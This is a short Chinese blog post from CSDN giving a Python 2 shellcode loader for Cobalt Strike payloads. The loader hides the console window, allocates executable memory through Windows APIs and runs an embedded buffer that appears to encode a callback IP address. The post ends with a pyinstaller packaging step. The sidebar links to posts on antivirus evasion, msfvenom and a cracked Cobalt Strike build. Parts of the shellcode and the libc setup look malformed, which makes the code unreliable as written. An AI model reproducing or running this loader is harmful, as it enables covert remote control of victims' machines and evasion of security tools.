Cobait strike python ShellCoded 使用方法

最新推荐文章于 2024-05-09 16:38:31 发布
最新推荐文章于 2024-05-09 16:38:31 发布
阅读量501 收藏 2
点赞数
分类专栏: 学海无涯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38656841/article/details/107404692
版权

python 的shellcode 利用方法

第一步生成payload

查看文件

然后下面的代码是python2的代码 将里面的buf替换掉

from ctypes import *
import ctypes
# length: 614 bytes
buf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\xf\74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x32\x30\x2e\x39\x32\x2e\x33\x33\x2e\x31\x30\x33\x00\x12\x34\x56\x78"
#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
    buf = c_char_p(buffer)
    size = len(buffer)
    addr = libc.valloc(size)
    addr = c_void_p(addr)
    if 0 == addr: 
        raise Exception("Failed to allocate memory")
    memmove(addr, buf, size)
    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
        raise Exception("Failed to set protection on buffer")
    return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()   
if whnd != 0:
       if 1:
              ctypes.windll.user32.ShowWindow(whnd, 0)   
              ctypes.windll.kernel32.CloseHandle(whnd)
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()

 最后 pyinstaller --onefile python文件

 

时光凉春衫薄
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
COBAIT STRIKE
weixin_41082546的博客
08-24 568
COBAIT STRIKE 3.14破解版: https://download.csdn.net/download/weixin_41082546/11604021 客户端攻击重定向设置 view —application 查看目标系统日志 attack—web-drive-by—site clone 在此之前需要先生成一段攻击代码 钓鱼邮件实施 的4个阶段 ...
利用Python执行ShellCode
2201_75774378的博客
05-05 589
D:\网安\sike\ShellCode_Loader>Shellcode_encryption.exe shellcode_xor.c。将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = ‘密文Shellcode’ 处。运行:Shellcode_encryption.exe payload.c 对ShellCode代码进行加密处理。使用Python 64位版加载器。生成x64位的ShellCode使用64位版Python加载器。Python加载器实现免杀。
网络安全最全Cobalt Strike使用教程一_cobaltstrike,2024年最新大厂面试必备技能
最新发布
2301_77033672的博客
05-09 704
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
python执行shellcode_python exec shellcode
weixin_39620653的博客
12-03 568
前言这里我先吐槽一下,网上用中文搜的python执行shellcode。全部是复制粘贴,棒的我不知道如何下手然后今天早上@即刻安全-Yansu老哥帮我整出来了。老板喝茶正文代码我理解不了多少,可能还有错的获取shellcodemsfvenom -p windows/x64/exec CMD=calc.exe -f py -o /root/demo.py执行shellcode代码如下import c...
python 执行shellcode_执行shellcode方法
weixin_39518678的博客
12-05 763
前言进程内存布局需要理解的第一个概念是,整个虚拟内存空间分为两个相关部分:为用户进程保留的虚拟内存空间(用户空间)和为系统进程保留的虚拟内存空间(内核空间),如下所示当处理器读写内存位置时,它使用一个虚拟地址。作为读写操作的一部分,处理器将虚拟地址转换为物理地址。通过虚拟地址访问内存具有这些优点:程序可以使用一个连续的虚拟地址范围来访问物理内存中不相邻的大内存缓冲区程序可以使用一定范围的虚拟地址来...
python免杀技术---shellcode的加载与执行
qq_41683305的博客
05-22 1136
0x01 生成shellcode 首先通过下列命令生成一个shellcode使用msfvenom -p选项来指定paylaod,这里选用windows/x64、exec模块接收的参数。使用calc.exe执行弹出计算器的操作。-f选项用来执行生成的shellcdoe的编译语言。 msfvenom -p windows/x64/exec CMD='calc.exe' -f py 0x02 加载与执行shellcode的程序 程序为: # -*- coding:utf-8 -*- import ctyp
Python调用shell命令并返回code和error的方式
qq_35941018的博客
01-21 655
https://www.cnblogs.com/GODYCA/archive/2013/05/08/3066870.html
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1267
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
CobaltStrike4.0用户手册_中文翻译.pdf
04-29
CobaltStrike4.0用户手册_中文翻译.pdf
python执行shell命令的几种方法
tzh_linux的专栏
04-11 457
os.system(command)类似c语言里的system函数,只能执行命令,无法获取输出,返回值跟c类似,将shell的返回值放到了8-15位 os.popen(command [, mode='r' [, bufsize]])也跟c语言类似,c语言返回的是一个文件流指针,python返回的是一个文件对象,可以用read方法读取文件对象的内容,但无法获取返回值 commands.getstat
Cobalt Strike使用教程一
热门推荐
迷风小白
10-24 7万+
0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集...
x64 QWORD Xor shellcode encoder
weixin_34008805的博客
04-19 141
#!/usr/bin/env python #Filename: Xor_QWORD_x64.py #coding=utf-8 import re import sys import random import struct class QWORDXorEncoder: def __init__(self): self.name = "x64 QWORD X...
CobaltStrike插件合集
whojoe的博客
10-02 5074
CobaltStrike插件合集 https://github.com/realoriginal/ppdump-public https://github.com/bitsadmin/nopowershell https://github.com/bitsadmin/fakelogonscreen https://github.com/offsecginger/AggressorScripts https://github.com/mdsecactivebreach/CACTUSTORCH https://
cobalt strike快速上手指南(一)
awindog的博客
02-19 695
简介 Cobalt Strike是一款美国Red Team开发的神器,常被业界人称为CS。以Metasploit为基础的GUI框架式工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。 Cobalt Strike主要用于团队作战,可谓是团队必备神器,能让多个测试人员同时连接到团体服务器上,共享测试资源与目标信息和sessions。 Cobalt St...
Python免杀火绒、360和Defender
江左盟的博客
10-10 2万+
目录 简介 环境 原理 加载ShellCode 定位特征码 Base64编码绕过 简介 之前学习免杀都是使用Metasploit自带的编码进行,从未成功过。也使用过GitHub上别人提供的免杀方法,最近学习并实践发现绕过国内的杀毒软件貌似并不难,本文使用手工分析特征码,使用base64编码绕过杀毒软件静态分析。虽然使用方法比较简单,但对实际做免杀及免杀研究还是有一定意义的。 环境 Windows 10 x64 Python 3.8.3 Pyinstaller 火绒版本:5.0..
Cobalt简介
bizzareblizzard的专栏
06-19 3099
Cobalt是一个轻量的应用容器(应用程序runtime, 类似JVM和Flash Player), 兼容W3C HTML5规范的子集。 如果想开发一个单页面的网页应用(Single-Page Web Application, SPA), 使用Cobalt的W3C规范子集开发的页面,可以在Cobalt支持的设备上运行。 Cobalt最开始是由Chromium项目的一个分支H5VCC(HTML5 ...
python LInux下使用ctypes操作内存
chl0000的专栏
07-30 1401
ctypes创建的内存不能自动对齐,可以使用如下方法对齐内存: # _*_ coding:UTF-8 import sys import time import os import ctypes import ctypes.util def ctypes_alloc_aligned(size, alignment): buf_size = size + (al...
利用python免杀cs shellcode
蚁景网安学院
02-13 2143
0x01 前言2019年,告别了coder的世界,告别了从前的生活。我决定暂时抛开金钱至上的价值体系,以一个Fucking loser的身份去寻找人生中的三大哲学问题,我是谁,我在哪儿,...
[原创]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)
weixin_30432179的博客
07-21 4973
0x001 原理 采用分离法,即将ShellCode和加载器分离。方法较LOW但免杀。 本文主要将ShellCode转成HEX,再通过加载器执行ShellCode。 PS: 何为SC加载器,即专门用于加载所提供ShellCode的工具。 如同HTTP发包工具,支持提交HTTP,写死参数最多只能叫EXP。 再详细点,打个比方,你只会炒一个菜,你敢说你是厨师吗? 0x002 ShellCo...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值